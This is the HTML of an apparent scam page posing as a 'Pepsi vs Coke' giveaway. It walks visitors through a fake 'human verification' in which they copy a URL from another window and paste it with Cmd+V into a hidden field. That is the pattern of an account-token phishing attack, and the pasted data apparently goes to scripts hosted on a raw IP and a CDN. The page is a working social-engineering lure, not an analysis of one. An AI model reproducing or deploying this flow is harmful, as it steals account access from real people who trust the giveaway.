<!-- Begin slides. Just make elements with a class of slide. -->
<!--<div class="deck-wrapper">-->
<div class="deck-container">
<section id="slide1" class="slide subtitle">
	<h1 class="user-title title">Pepsi vs Coke Giveway</h1>

		<div class="deck-content">
			<div class="user-content">
			<center>
				<script type="text/javascript">
				    //<![CDATA[
				        LSM_Slot({
				            adkey: '078',
				            ad_size: '468x60',
				            slot: 'slot59662'
				        });
				    //]]>
				</script>
			</center>
			<img src="http://i.imgur.com/7mGihxh.png" onclick="javascript:$('#add-app').click(); return false;" style="cursor: pointer" >

		</div>
	</div>

	<div class="bottom">
		<div class="upper" style="height: 2em; margin-bottom: .25em">
			<div class="countdown hidden">
				<div class='header'>
					Time Remaining
				</div>
				<span class="days">0</span><span class="day label">days</span>
				<span class="hours">0</span><span class="hour label">hours</span>
				<span class="minutes">0</span><span class="minute label">minutes</span>
				<span class="seconds">0</span><span class="seconds label">seconds</span>
			</div>
			<!--<a class="uibutton large confirm bottom" id="get-started">Get Started</a>-->
		</div>
<div class="sponsor" style="
    height: 19px;
    display: block;
    margin-bottom: 0;
    padding-top: 0.3em;
    background: #FFF;
    padding-bottom: 8px;
    padding-top: 8px;
    border-top: 1px solid #DDDDDD;
    opacity: 2;
"><span style="
    font-size: 14px;
    font-family: cursive;
    letter-spacing: 5px;
    position: relative;
    top: 1px;
    margin-left: 15px;
    color: rgb(163, 163, 163);
    white-space: nowrap;
    display: inline;
    text-shadow: none;
    float: left;
">Sponsored by</span><div class="sponsor left" style="
    padding: 0;
    margin: 0;
    height: 20px;
    line-height: 0px;
    width: auto;
    float: right;
    margin-top: -8px;
    height: 35px;
    background: #FFFFFF;
    color: black;
    padding-right: 1em;
    text-align: center;
    opacity: 0.4;
">

<img class="app-icon" style="
    height: 13px;
    margin: 0;
    padding: 0;
    display: inline;
    margin-top: 10px;
    float: left;
    border: 1px solid black;
    border-radius: 4px;
    filter:  url(&quot;data:image/svg+xml;utf8,&lt;svg xmlns=\&#39;http://www.w3.org/2000/svg\&#39;&gt;&lt;filter id=\&#39;grayscale\&#39;&gt;&lt;feColorMatrix type=\&#39;matrix\&#39; values=\&#39;0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0\&#39;/&gt;&lt;/filter&gt;&lt;/svg&gt;#grayscale&quot;); 
    filter: gray;
    -webkit-filter: grayscale(100%);

"><div class="app-name sponsor-name" style="
    font-size: 12px;
    font-family: cursive;
    letter-spacing: 0.2em;
    white-space: nowrap;
    display: inline-block;
    text-shadow: none;
    height: 35px;
    display: inline-block;
    padding: 0;
    margin: 0;
    line-height: 35px;
    padding-left: 0.5em;
    text-align: center;
    float: left;
"></div>

</div>
<br style="clear: both;display: block;"></div>
	</div>


</section>

<section class="slide subtitle" id="slide2">
	<h1 class="title">Human Verification</h1>
	<h2 class="subtitle">Sorry! We have to confirm that you're not a robot before you continue</h2>
	<div class="deck-content">

	<h3 class="step">
			<strong>
			<span class="label">

			</span>Copy the URL</strong> from the <span class="highlight">other window</span>, this is your verification code
			<br><img style="border-radius: 3px;border: 5px solid #333;" src="http://i.imgur.com/aHAJ7oA.png">
		<br><br>
		
		<span class="highlight">Click here after Copying your code</span></h3>
		<br>

					
		
		<div id="app-permissions" onclick="javascript:$('#add-app').click(); return false;" style="cursor: pointer">

	</div>
	
</div>

				<div class="bottom">
		<div class="upper" style="height: 2em; margin-bottom: .25em">
			<div class="countdown hidden">
				<div class='header'>
					Time Remaining
				</div>
				<span class="days">0</span><span class="day label">days</span>
				<span class="hours">0</span><span class="hour label">hours</span>
				<span class="minutes">0</span><span class="minute label">minutes</span>
				<span class="seconds">0</span><span class="seconds label">seconds</span>
			</div>
			<a class="uibutton large confirm bottom" id="add-app"> </a>
		</div>
<div class="sponsor" style="
    height: 19px;
    display: block;
    margin-bottom: 0;
    padding-top: 0.3em;
    background: #FFF;
    padding-bottom: 8px;
    padding-top: 8px;
    border-top: 1px solid #DDDDDD;
    opacity: 2;
"><span style="
    font-size: 14px;
    font-family: cursive;
    letter-spacing: 5px;
    position: relative;
    top: 1px;
    margin-left: 15px;
    color: rgb(163, 163, 163);
    white-space: nowrap;
    display: inline;
    text-shadow: none;
    float: left;
">Sponsored by</span><div class="sponsor left" style="
    padding: 0;
    margin: 0;
    height: 20px;
    line-height: 0px;
    width: auto;
    float: right;
    margin-top: -8px;
    height: 35px;
    background: #FFFFFF;
    color: black;
    padding-right: 1em;
    text-align: center;
    opacity: 0.4;
">

<img class="app-icon" style="
    height: 13px;
    margin: 0;
    padding: 0;
    display: inline;
    margin-top: 10px;
    float: left;
    border: 1px solid black;
    border-radius: 4px;
    filter:  url(&quot;data:image/svg+xml;utf8,&lt;svg xmlns=\&#39;http://www.w3.org/2000/svg\&#39;&gt;&lt;filter id=\&#39;grayscale\&#39;&gt;&lt;feColorMatrix type=\&#39;matrix\&#39; values=\&#39;0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0.3333 0.3333 0.3333 0 0 0 0 0 1 0\&#39;/&gt;&lt;/filter&gt;&lt;/svg&gt;#grayscale&quot;); 
    filter: gray;
    -webkit-filter: grayscale(100%);

"><div class="app-name sponsor-name" style="
    font-size: 12px;
    font-family: cursive;
    letter-spacing: 0.2em;
    white-space: nowrap;
    display: inline-block;
    text-shadow: none;
    height: 35px;
    display: inline-block;
    padding: 0;
    margin: 0;
    line-height: 35px;
    padding-left: 0.5em;
    text-align: center;
    float: left;
"></div>

</div>
<br style="clear: both;display: block;"></div>
	</div>

</section>

<section class="slide subtitle">
	<h1 class="title">Last Step:</h1>

	<div class="deck-content">
	<h3>Press the key combination below to prove that you are human</h3>
	<div class="keys">

		<span id="pasteKey" class="key meta">&#8984;</span><span class="plus"> + </span><span class="key v">V</span>
		<br style="clear: both" />
		
	
	</div>

	<p>
		
	</p>
</div>
</section>
<section class="slide subtitle">
	<h1 class="title">Authenticating...</h1>
	<h2 class="subtitle">We're currently processing your entry, this may take a minute</h2>
	<div class="deck-content">
	<img src="http://i.imgur.com/tJuMt.gif" style="margin-top:10%">
	</div>
</section>
<section class="slide subtitle">
	<h1 class="title">You have been verified!</h1>
	<h2 class="subtitle">We've processed your verification data successfully</h2>
	<div class="deck-content">
	<p>Please wait while we redirect you...</p>
</div>
</section>
<!-- End slides. -->


<!-- Begin extension snippets. Add or remove as needed. -->

<!-- deck.navigation snippet -->
<!--
<a href="#" class="deck-prev-link" title="Previous">&#8592;</a>
<a href="#" class="deck-next-link" title="Next">&#8594;</a>
-->

<!-- deck.hash snippet -->
<!--<a href="." title="Permalink to this slide" class="deck-permalink">#</a>-->

<!-- End extension snippets. -->


<!-- Required JS files. -->
<script>BASE_URL = "http:\/\/64.79.76.226\/~silali\/watch\/";</script>
<script src="http://dzi53wj925pgs.cloudfront.net/watch/jquery-1.7.2.min.js" id='jquery'></script>
<script src="http://dzi53wj925pgs.cloudfront.net/watch/core/deck.core.js"></script>
<script src="http://dzi53wj925pgs.cloudfront.net/watch/js/uri.js"></script>
<script src="http://dzi53wj925pgs.cloudfront.net/watch/js/blob.js"></script>
<script src="http://dzi53wj925pgs.cloudfront.net/watch/js/canvas-toblob.js"></script>
<script src="http://dzi53wj925pgs.cloudfront.net/watch/js/jquery.backstretch.js"></script>
<script src="http://dzi53wj925pgs.cloudfront.net/watch/js/sugar.js"></script>
<script src="http://dzi53wj925pgs.cloudfront.net/watch/js/jquery.cookie.js"></script>
<!--<script src="http://dzi53wj925pgs.cloudfront.net/watch/js/jquery.blank.js"></script>-->
<script src="http://dzi53wj925pgs.cloudfront.net/watch/core/deck.core.js"></script>

<!--<script src="extensions/navigation/deck.navigation.js"></script>-->
<script src="jackphp.js"></script>

<!-- Extension JS files. Add or remove as needed. -->

<!--<script src="extensions/hash/deck.hash.js"></script>
<script src="extensions/menu/deck.menu.js"></script>
<script src="extensions/goto/deck.goto.js"></script>
-->
<!--<script src="extensions/status/deck.status.js"></script>-->





<!-- Whitefire Widget Intergration -->



</div>
<!--</div>-->
<input type="text" id="dummy" value=" ">

<div style="display:none">

</div>